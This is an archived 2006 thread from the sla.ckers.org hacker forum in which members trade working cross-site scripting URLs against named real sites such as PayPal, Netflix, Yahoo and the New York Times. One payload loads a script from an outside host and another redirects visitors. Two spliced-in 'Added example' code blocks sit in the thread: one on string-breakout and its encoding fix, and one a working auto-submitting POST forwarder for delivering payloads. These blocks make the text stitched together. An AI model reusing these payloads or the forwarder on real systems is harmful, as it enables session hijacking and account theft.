Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 9 of 65
Re: So it begins
Posted by: maluc
Date: September 27, 2006 03:46PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here<script+src=http://ha.ckers.org/s.js></script>&areacode=&phone=&phoneExt=&region=&howtocontact=phone&action=Submit <- www.f5.com .. this time not unexploitable (double negative, i know)

unsexy version: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,48))%3C/script%3E&areacode=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,49))%3C/script%3E&phone=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E&phoneExt=&region=&howtocontact=phone&action=Submit

-maluc

Re: So it begins
Posted by: Kyran
Date: September 27, 2006 04:08PM

Ouch. Even if the denial was right, they still have other holes.

- Kyran

Re: So it begins
Posted by: kirke
Date: September 27, 2006 04:41PM

maluc, well done.
But who XSS'd the vendor comments @ http://www.darkreading.com/document.asp?doc_id=104739&WT.svl=news2_1 ?
They are persistent :-/

Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:09PM

Thanks, and I'm not sure what you mean.. or has it already been removed?

-maluc

Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:46PM

Well, I must say I gave this quite a bit of thought as to whether or not to disclose this. Combined with the MySpace hole crafted into another worm, and abusing Firefox/IE's (/Google's?) password managers, this can very easily net thousands of accounts. If I had a friend in Russia .. well, luckily I don't.

Anyway, hopefully it's patched soon: https://www.paypal.com/cgi-bin/webscr?cmd=asdf');alert('XSS');eval('p-outside

-maluc

Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:49PM

and for good measure: https://www.paypal.com/cgi-bin/webscr?cmd=asdf%22;alert(%22XSS%22);x%20=%22-outside

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 06:01PM

Nice one, I could only get the second one to work. I've also reported it.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: kirke
Date: September 27, 2006 06:02PM

<cite darkreading>
..
Acutenix and F5 this week said their sites were inaccurately cited with XSS flaws by the hacker bulletin board, Sla.ckers.

Tamara Borg, Acutenix's marketing director, says the company has no XSS or other vulnerabilities on its site. "We are developers of a Web application security software tool which detects such vulnerabilities," she says. "Our Website is scanned on a daily basis to ensure that no such vulnerabilities exist."

F5 says its site did have a vulnerability, but it was an HTML injection issue, not XSS.
..
</cite>
blah, blah, blah, ...

Doesn't need to be commented any more if you have seen the previous PoC links ;-)

Re: So it begins
Posted by: maluc
Date: September 27, 2006 06:09PM

The first one didn't work for you, WhiteAcid? It works in FF/Opera/IE7 for me, with or without cookies .. note that the -outside part is necessary.

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 06:13PM

I must be an idiot, it worked now.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 06:45PM

Just thought I would post this to support the cause - next time they say it never happened we can rest assured we have proof.

You see, the only thing worse than an incompetent website security company is one that fails to admit their flaws (in fact they outright lied about it).



----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: maluc
Date: September 27, 2006 07:09PM

heh, that might be the first image posted on this whole forum _-_

But yes, I agree wholeheartedly .. it's not easy to write XSS-free sites for a company, just like trying to write bug-free software. Vulnerabilities are gonna surface .. fixing them promptly shows a lot more credibility than the old 'weather balloon' tactics.

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 07:12PM

There have been images, some of bandwidth spikes id has posted and one of a charset I posted a while back. This is certainly the first that almost causes horizontal scrolling :p

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: maluc
Date: September 27, 2006 07:37PM

Oh ya, I guess I tend to assume stuff id says is on a random page somewhere .-. .. and I didn't remember seeing your charset pic. So ah well, not a first .. touché.

-maluc

Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 08:03PM

OK, it's not an XSS or anything like that, but more an example of how bad coding standards can disclose sensitive information.

I found this while viewing some HTML source code:

file:///C:/Documents%20and%20Settings/sauterd/Local%20Settings/Temporary%20Internet%20Files/FrontPageTempDir/buttonCA.jpg

OK, not really a big deal you would assume; some fool (presumably sauterd) has left his Windows username and document path in the code... not a biggie... except... this was lifted from http://www.norad.org/.

Hence with some simple code viewing I now have a valid NORAD username.

Good thing they aren't in charge of protecting the IT infrastructure.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 09/27/2006 08:03PM by digi7al64.

Re: So it begins
Posted by: maluc
Date: September 27, 2006 09:25PM

http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=asdf%27%3Balert%28%27XSS%27%29%3Bx+%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=1981&mon2=09&day2=27&year2=2006
'insert'; breakout

-maluc



Edited 2 time(s). Last edit at 09/27/2006 09:42PM by maluc.

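Added example (not from the thread, and not the markup of any site linked in it): the 'insert'; breakout maluc labels above, reproduced against a constructed JavaScript-string sink so the two things these PoC URLs depend on can be checked offline. First, the payload has to use the same quote character the page used around the reflected value. Second, after the injected statements it has to leave the rest of the script parseable (that is what the x=' tail is for); otherwise the browser raises a syntax error and nothing, including the alert, ever runs. The sink template, the track() call and the use of new Function as a stand-in for the browser executing the page's script are assumptions made for this example. The hardened version shows the fix, which is to emit the value through a JavaScript-string encoder instead of string concatenation.

```javascript
// Added example, not code from the thread or from any site named in it.
// Demonstrates the "'insert'; breakout" pattern against a constructed
// JavaScript-string sink, and the encoding that closes it.

// Constructed vulnerable sink: the reflected value is pasted straight into a
// single-quoted JS string literal inside an inline script.
function renderVulnerable(query) {
  return "var q = '" + query + "'; track(q);";
}

// Encoder for a value that lands inside a <script> block: JSON.stringify
// handles quotes, backslashes and control characters; the extra replacements
// stop the value from closing the script element or breaking the line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\//g, "\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened sink: same template, value emitted through the encoder.
function renderHardened(query) {
  return "var q = " + jsStringLiteral(query) + "; track(q);";
}

// Stand-in for the browser running the generated script. alert() and track()
// are stubbed; every alert call is recorded so the test can see whether the
// payload escaped the string context. A SyntaxError means the breakout left
// the script unparseable, so nothing ran at all.
function execute(script) {
  const alerts = [];
  const alert = (msg) => alerts.push(msg);
  const track = () => {};
  try {
    new Function("alert", "track", script)(alert, track);
    return { parsed: true, alerts };
  } catch (e) {
    if (e instanceof SyntaxError) return { parsed: false, alerts, error: e.message };
    throw e;
  }
}

// Constructed payloads mirroring the ones in the thread.
const BREAKOUT = "asdf';alert('XSS');x='";     // closes the string, repairs the tail
const NO_TAIL = "asdf';alert('XSS');";         // closes the string, leaves a dangling quote
const WRONG_QUOTE = 'asdf";alert("XSS");x ="'; // double-quote variant against a single-quoted sink

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, script] of [
    ["vulnerable, breakout", renderVulnerable(BREAKOUT)],
    ["vulnerable, no tail", renderVulnerable(NO_TAIL)],
    ["vulnerable, wrong quote", renderVulnerable(WRONG_QUOTE)],
    ["hardened, breakout", renderHardened(BREAKOUT)],
  ]) {
    console.log(label + ": " + JSON.stringify(execute(script)) + "\n  " + script);
  }
}
```

The same check works for any reflected value: if execute(render(value)).alerts is non-empty the value escaped the string context, and if parsed is false a breakout was attempted but the tail did not repair the syntax, which is the failure mode behind "the -outside part is necessary" in the post above.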
Re: So it begins
Posted by: cheng
Date: September 27, 2006 10:41PM

http://www.truste.org/ivalidate.php?url=%77%27%20%73%74%79%6C%65%3D%27%78%78%3A%65%78%70%72%65%73%73%69%6F%6E%28%61%6C%65%72%74%28%29%29
It uses EXPRESSION. I'm sorry, you might get trouble when you wanna close the window.



Edited 1 time(s). Last edit at 09/27/2006 10:53PM by cheng.

Re: So it begins
Posted by: maluc
Date: September 27, 2006 11:21PM

Wow, that's a great first post cheng, because I honestly didn't know of an auto-executing tag property for IE .. it's not auto-executing per se .. but it's a mouseover for the entire webpage. Interesting stuff.

Is this a deprecated function for eval? It doesn't seem to be well documented anywhere; in particular, w3schools makes no mention.

-maluc

Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 11:28PM

http://www.virgin.com/search/?kwd=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=27&y=5

http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&CID=30000&Submit.x=0&Submit.y=0

http://search.forbes.com/search/find?MT=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&sort=&aname=&author=&date=&pub=forbes.com%2Cmagazine%2Cglobal%2Cfyi%2Casap%2Cbest%2Cbow%2Cap%2Cpinnacor%2Cafx

http://www.pcworld.com/search/results?qt=%22%20onmouseover=%22alert('xss');%22 << requires mouseover on almost anything

http://www.aapt.com/%3C/title%3E%3C/head%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E.cfm?nft=1&t=5&p=1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 4 time(s). Last edit at 09/27/2006 11:53PM by digi7al64.

Re: So it begins
Posted by: Ghozt
Date: September 27, 2006 11:51PM

http://cgi.yahoo.com/bin/userbug?name=Null&email=null@yahoo.com&phone=1000-000-0000&category=Nowhere&comments=<script>javascript:alert('Hello.')</script>

Found it yesterday.



Edited 1 time(s). Last edit at 09/27/2006 11:52PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:23AM

Well, good job Ghozt, I have a tough time finding ones on Yahoo.

And welcome to the forum..

Looks like I'll have to play some catch-up with digital ^^

-maluc

Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:29AM

https://www.netflix.com/LoginHelp?lname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&cardNumber=&routingNumber=&accountNumber=&SubmitButton=Send&forgot=LOGIN

-maluc

Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:32AM

http://www.blockbuster.com/search/PerformKeyWordSearchAction.action?searchType=Movies&schannel=Movies&subChan=&keyword=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&x=0&y=0

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 12:37AM

Thanks for the welcome maluc. :)

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 12:51AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www-5.jeep.com:80/searchapp/ui.jsp&ui_mode=question&charset=UTF-8&language=en-US&brandSite=jeep&prior_transaction_id=10602&question_box=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22 << Jeep.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:59AM

https://support.opera.com/bin/customer?action=sendPassword&email=GetFireFox%22%3E%3Cscript%3Ealert%28%22Get+FireFox%22%29%3Bdocument.write+%28%27%3CMETA+HTTP-EQUIV%3D%22refresh%22+content%3D%220%3BURL%3Dhttp%3A%2F%2Fwww.getfirefox.net%2F%22%3E%27%29%3B%3C%2Fscript%3E%3Cx+x%3D%22&ok=OK

I really do love Opera 8 though :x .. I can't find at least 20% of these without it.

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:08AM

By the way, I'm seeing a lot of these POST attacks directed through whiteacid.org; you know that you can put a POST string in a URL, right? For example, instead of a post that has uname=User&pwd=Pass you could use site.com/login.php?uname=User&pwd=Pass

You probably do, but I just thought I'd mention it in case.

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 01:13AM

@Ghozt

Though I could be wrong, a request.form("name") is different from a request.querystring("name"), at least in ASP, and I know that PHP sort of handles that the same way (correct me if I am wrong). However, what you are talking about would work when the form was set to "GET" and not "POST".

Here is an example:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9 << works

http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9 << doesn't work

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:19AM

chevrolet.com works, You used "&" instead of "?" (index.jsp&query=).

Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:19AM

Ghozt, when you put the input fields in the URL like that, you are making a GET request. Even though most forms submit it as POST, they accept both POST and GET versions.. however, some don't. Using the WebDeveloper extension for Firefox, I always first try to submit it as GET, but for the sites that specifically only allow POST - WhiteAcid was kind enough to make that script when I requested it.

But yesh, please try to first test it as a GET; it's more powerful for exploitation (not that anyone here intends to).

And btw, I recently discovered with that opera.com hole that WebDeveloper's conversion doesn't always work even when it should.. using the conversion, it doesn't include the 'action=sendPassword' field, which is only part of the URL, not the form.. I'm glad I tried adding it manually.

Edit: it too is a TRUSTe site, if that actually is supposed to represent better security. -__-

-maluc



Edited 1 time(s). Last edit at 09/29/2006 07:00PM by maluc.

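Added example (not WhiteAcid's actual xss_post_forwarder.php, whose source is not on this page): a minimal POST forwarder of the kind the links in this thread go through, written in JavaScript so it can be run with Node. It takes a forwarder-style URL, pulls xss_target and the remaining query parameters out of it, and emits an HTML page whose hidden form posts those fields to the target and submits itself on load. That is the whole trick the last few posts are about: a handler that only reads the POST body (Request.Form in ASP, $_POST in PHP) never sees the query string, so a GET link has to be turned back into a real POST by a page the victim loads. Two details are assumptions made for this example rather than taken from the original script: field values are HTML-escaped so the forwarder page is not itself injectable (the browser decodes the entities before submitting, so the target still receives the raw payload), and xss_target is restricted to http(s) URLs.

```javascript
// Added example, not WhiteAcid's script: a generic POST forwarder.
// Input:  a URL such as
//   http://forwarder.example/post.php?xss_target=http://target.example/contact.php&name=XSS+here%3Cscript%3E...
// Output: an HTML page whose hidden form POSTs name=... to the target on load.
// Host names above are constructed placeholders.

// Minimal HTML attribute/text escaper so the generated page cannot be
// injected into through the forwarded field names or values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Split the forwarder URL into the POST target and the ordered list of fields.
// URLSearchParams decodes "+" as a space and "%3C" as "<", exactly as a form
// submission would, and keeps repeated parameters as separate entries.
// Throws if xss_target is missing or is not an http(s) URL, so the forwarder
// cannot be pointed at javascript: or other schemes (assumed policy).
function parseForwarderUrl(forwarderUrl) {
  const u = new URL(forwarderUrl);
  const params = new URLSearchParams(u.search);
  const target = params.get("xss_target");
  if (!target) throw new Error("xss_target missing");
  const t = new URL(target);
  if (t.protocol !== "http:" && t.protocol !== "https:") {
    throw new Error("xss_target must be an http(s) URL");
  }
  params.delete("xss_target");
  const fields = [];
  for (const [name, value] of params) fields.push([name, value]);
  return { target: t.href, fields };
}

// Build the auto-submitting page. The <noscript> button keeps it usable when
// scripting is off; the form itself carries the payload, not the script.
function buildPostForwarder(forwarderUrl) {
  const { target, fields } = parseForwarderUrl(forwarderUrl);
  const inputs = fields
    .map(([n, v]) => `<input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join("\n");
  return `<!DOCTYPE html>
<html><body onload="document.forms[0].submit()">
<form method="POST" action="${escapeHtml(target)}">
${inputs}
<noscript><input type="submit" value="Continue"></noscript>
</form>
</body></html>`;
}

// Constructed sample input in the shape of the links above.
const SAMPLE_URL =
  "http://forwarder.example/post.php?xss_target=http://target.example/contact.php" +
  "&name=XSS+here%3Cscript%3Ealert(1)%3C/script%3E&howtocontact=phone&action=Submit";

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildPostForwarder(SAMPLE_URL));
}
```

Note the order of decoding: the payload arrives percent-encoded in the query string, is decoded once by URLSearchParams, is entity-encoded into the hidden input's value attribute, and is decoded again by the browser when it serialises the form. The target therefore receives the same bytes a direct POST would have carried, while the forwarder page itself never contains an unescaped "<" from the attacker-controlled fields.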